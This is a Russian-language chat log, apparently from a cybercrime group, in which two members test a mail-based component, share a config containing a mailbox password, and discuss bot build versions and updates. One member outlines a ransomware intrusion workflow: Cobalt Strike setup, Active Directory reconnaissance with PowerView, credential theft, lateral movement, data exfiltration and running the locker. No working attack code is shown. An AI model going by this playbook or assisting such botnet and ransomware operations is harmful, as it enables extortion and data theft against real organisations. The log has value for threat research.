[11.11.21 08:09:48] angelo:		delegate
[11.11.21 08:09:54] angelo:		или lackey
[11.11.21 08:09:55] angelo:		?
[11.11.21 08:10:02] rocco:		delegat
[11.11.21 08:10:29] rocco:		в системе конечный файл прописался
[11.11.21 08:10:31] angelo:		я вчера вроде инкоды отработал
[11.11.21 08:10:55] rocco:		я поменял ящики везде
[11.11.21 08:10:57] angelo:		мой конфиг
[11.11.21 08:11:01] angelo:		`period=10
mail={test@14740-27223.bacloud.info|CKFYQ25SMyli2STV|14740-27223.bacloud.info|14740-27223.bacloud.info}
mail={w-1@14740-27223.bacloud.info}`
[11.11.21 08:11:35] rocco:		ща попробую с твоими ящиками
[11.11.21 08:12:11] rocco:		от w-1 какой пасс?
[11.11.21 08:12:54] angelo:		блин а вот хрен его знает
[11.11.21 08:13:02] angelo:		вбей эту конфу
[11.11.21 08:13:02] angelo:		к себе
[11.11.21 08:13:12] angelo:		в таком виде
[11.11.21 08:13:12] angelo:		period=10
mail={test@14740-27223.bacloud.info|CKFYQ25SMyli2STV|14740-27223.bacloud.info|14740-27223.bacloud.info}
mail={w-1@14740-27223.bacloud.info}
[11.11.21 08:13:15] angelo:		и пробуй
[11.11.21 08:13:41] rocco:		скопировал
[11.11.21 08:14:24] angelo:		попробуй если чт окину свою сборку
[11.11.21 08:14:25] angelo:		мало ли
[11.11.21 09:44:39] angelo:		ну как ?
[11.11.21 14:58:26] rocco:		анж, ты другие ящики пробовал кроме нашего сервера?
[11.11.21 14:58:41] rocco:		почемуто только работает с нашими ящиками
[11.11.21 15:06:10] angelo:		другие нет
[11.11.21 15:06:12] angelo:		траблы ?
[11.11.21 15:06:29] rocco:		по ходу да
[11.11.21 15:06:40] rocco:		на сервере можно любой ставить
[11.11.21 15:06:42] angelo:		надо было проверить конечно, но и так хватало дел (
[11.11.21 15:06:50] rocco:		но на клиенте работают только те что ты дал
[11.11.21 15:07:09] rocco:		вот щас мучаю
[11.11.21 15:07:12] rocco:		блин
[11.11.21 15:07:15] rocco:		хреново
[11.11.21 15:07:28] rocco:		в принципе ведь можно и наш сервер использовать
[11.11.21 15:07:50] rocco:		главное чтобы не заблокировали серв
[11.11.21 15:08:16] angelo:		блин этот вопрос надо с бруксом обсудить - почему
[11.11.21 15:08:28] angelo:		это же просто серв почтовый
[11.11.21 15:08:33] angelo:		разницы быть не должно
[11.11.21 15:08:41] rocco:		да вот его нет, я просто сегодня весь дегь тестирую, хотел уже в работу отдать
[11.11.21 15:09:14] angelo:		ну мы вот этот момент реально упустили
[11.11.21 15:09:33] rocco:		ладно ждем брукса
[11.11.21 15:09:42] rocco:		буду пробовать
[11.11.21 15:09:57] rocco:		что то с протоколом связано, может блочат
[11.11.21 15:11:41] angelo:		вроде Брукс говорл пробелм быть не должно с серваком (
[11.11.21 15:11:49] angelo:		типа сделано как раз для удобства
[11.11.21 17:55:39] angelo:		нужна твоя помощь будет
[11.11.21 17:55:43] angelo:		сможешь по кобе подсказать ?
[11.11.21 17:56:17] rocco:		davay
[11.11.21 17:56:27] angelo:		да не сейчас )
[11.11.21 17:56:31] angelo:		у меня тупые вопросы будут
[11.11.21 17:56:43] angelo:		корчое ты согласился )
[11.11.21 17:56:44] rocco:		не беда
[11.11.21 17:56:49] angelo:		нет у меня базы
[11.11.21 17:56:58] angelo:		сетевой работы блин
[11.11.21 17:57:00] rocco:		конечно помогу
[11.11.21 17:57:01] angelo:		пробел огромный
[11.11.21 17:57:10] angelo:		спасибо
[11.11.21 17:58:08] angelo:		ты знаешь как локеры юзают кобу ?
[11.11.21 17:58:13] angelo:		логаритм их
[11.11.21 17:58:34] rocco:		конечно от и до
[11.11.21 17:58:54] angelo:		я тут подписался к пентестерам если так можно сказать
[11.11.21 17:59:01] angelo:		но понял что пипец глупый для такого
[11.11.21 17:59:37] angelo:		первое, у тебя случаем манулов нету ? мало ли
[11.11.21 18:00:11] rocco:		мануалов к какому процессу?
[11.11.21 18:00:23] rocco:		как локнуть от а до я?
[11.11.21 18:01:53] rocco:		там несколько процессов, подготовка кобы, завод туда сеток, исследование сетки, домен бэкапы насы и т.д., вытягивание кред админов
[11.11.21 18:02:46] rocco:		ну и дальше, подключение по рдп к тачке из сетки с админскими правами
[11.11.21 18:03:02] rocco:		и дальше там запуск локера
[11.11.21 18:03:20] angelo:		застрял на исследовании сетки
[11.11.21 18:03:28] rocco:		еще перед этим слив инфы
[11.11.21 18:03:29] angelo:		типа есть ад файндер
[11.11.21 18:03:49] angelo:		короче, скажи когда можно будет тебя помучить а
[11.11.21 18:03:49] rocco:		там лучше есть инструменты powerview
[11.11.21 18:03:52] angelo:		я всё запишу
[11.11.21 18:04:10] angelo:		очень хочеться записатсья в пентестеры
[11.11.21 18:04:13] rocco:		ладно я поищу мануалы
[11.11.21 18:04:20] angelo:		спасибо огромное
[11.11.21 18:04:31] angelo:		вроде как мне дали время подучиться
[11.11.21 18:04:41] rocco:		там в принципе уже все сделано, подключаешь скрипты к кобе, и хуячишь
[11.11.21 18:04:43] angelo:		и сказали иди учи матчасть по сетям...
[11.11.21 18:05:12] rocco:		там основное знание это active directory
[11.11.21 18:05:20] angelo:		вот да
[11.11.21 18:05:30] angelo:		на ней меня стопорнули и отправили знаний набираться
[11.11.21 18:06:12] rocco:		там конечно толмуты по ней
[11.11.21 18:06:24] rocco:		ладно я посмотрю
[11.11.21 18:06:36] angelo:		дай обниму )
[11.11.21 18:06:46] angelo:		спсибо, я посижу помучаю гугл
[11.11.21 18:07:11] rocco:		почитай про боковое перемещение
[11.11.21 18:07:26] rocco:		это краеугольный камень по актив директории
[11.11.21 18:07:43] angelo:		ок, записал и подчиркнул
[11.11.21 18:07:53] rocco:		для пентестеров
[11.11.21 18:09:10] rocco:		начнешь про него читать, потянутся другие знания про актив
[11.11.21 18:10:01] rocco:		есть книжка от ralph хакера active directory глазами хакера, поищи может ввыложили уже
[11.11.21 18:10:34] rocco:		она может тяжеловата будет, но лучше с нее начать
[11.11.21 18:11:00] angelo:		хорошо, проштудирую
[11.11.21 18:11:05] angelo:		да, не простая профессия
[11.11.21 18:11:12] angelo:		нужна база админская
[13.12.21 11:59:26] angelo:		ты нужен кровь и зноса
[13.12.21 12:16:49] rocco:		где?
[13.12.21 12:17:13] angelo:		почитай Токс
[13.12.21 12:17:18] angelo:		я голову сломал всю
[13.12.21 12:17:25] angelo:		не понимаю тонкостей
[13.12.21 12:17:55] angelo:		раньше было просто Апдейт бота, теперь всплыли тонкости
[13.12.21 12:18:28] angelo:		ты поймёшь быстрее
[13.12.21 12:18:40] angelo:		ты точно поймёшь
[13.12.21 12:19:28] angelo:		Kod всё описал
[13.12.21 12:26:25] rocco:		так и?
[13.12.21 12:27:37] angelo:		какие мои дествия кроме стандартного апдейта бота ?
[13.12.21 12:27:43] angelo:		1)
[13.12.21 12:27:56] angelo:		2) мне батник кидать на обновление Бездарю
[13.12.21 12:28:34] angelo:		3) я не смог найти какие последнии версии бота(не хоеться потом перекриптовыват ьи снова пробывать заливать)
[13.12.21 12:47:55] angelo:		сможешь ответить ?
[13.12.21 12:48:38] rocco:		ты билдишь бота
[13.12.21 12:48:51] rocco:		на +1 повышай версию
[13.12.21 12:49:05] angelo:		а ты предыдущие версии знаешь ?
[13.12.21 12:49:06] rocco:		обоновляешь ты
[13.12.21 12:49:14] rocco:		какаие проекты?
[13.12.21 12:49:20] angelo:		сек
[13.12.21 12:49:37] angelo:		Pablo
[13.12.21 12:49:42] angelo:		Ramires
[13.12.21 12:49:51] angelo:		Hector
[13.12.21 12:50:11] rocco:		```
@set PRJ_NAME=Pablo
@set UPDATE_VER=10
```
[13.12.21 12:50:24] angelo:		11 будет ок
[13.12.21 12:50:26] rocco:		```
@set PRJ_NAME=Ramires
@set UPDATE_VER=12
```
[13.12.21 12:50:34] angelo:		+
[13.12.21 12:50:46] rocco:		```
@set PRJ_NAME=Hector
@set UPDATE_VER=12
```
[13.12.21 12:50:47] angelo:		гектор 12 был наврено
[13.12.21 12:50:49] angelo:		ок
[13.12.21 12:50:58] angelo:		всё правильно указал значит
[13.12.21 12:51:21] angelo:		так сделал билд как обычно Далее
[13.12.21 12:51:45] angelo:		меня напугали что надо на одном боте проверять апдейт и напугали что нельзя менять ботпак
[13.12.21 12:52:00] rocco:		ты новые домены добавил?
[13.12.21 12:52:11] angelo:		новые домены добавляет сейчас Гром
[13.12.21 12:52:26] angelo:		в админку
[13.12.21 12:52:41] angelo:		после я их добавляю при билде
[13.12.21 12:54:13] angelo:		ВАЖНО!!!!!!!!! у ботов у кого FileError статус - у них загрузчик можно обновить, а вот ботпак нельзя
[13.12.21 12:54:25] angelo:		разжуй плиз
[13.12.21 12:54:56] rocco:		щас это я не понял
[13.12.21 13:18:35] angelo:		как поёмешь - отпиши плиз
[13.12.21 14:43:36] angelo:		бро, надо разобраться, а то нужно апдейтить ботов
[16.12.21 18:23:11] angelo:		привет
[16.12.21 18:23:15] angelo:		надо сделать обнову
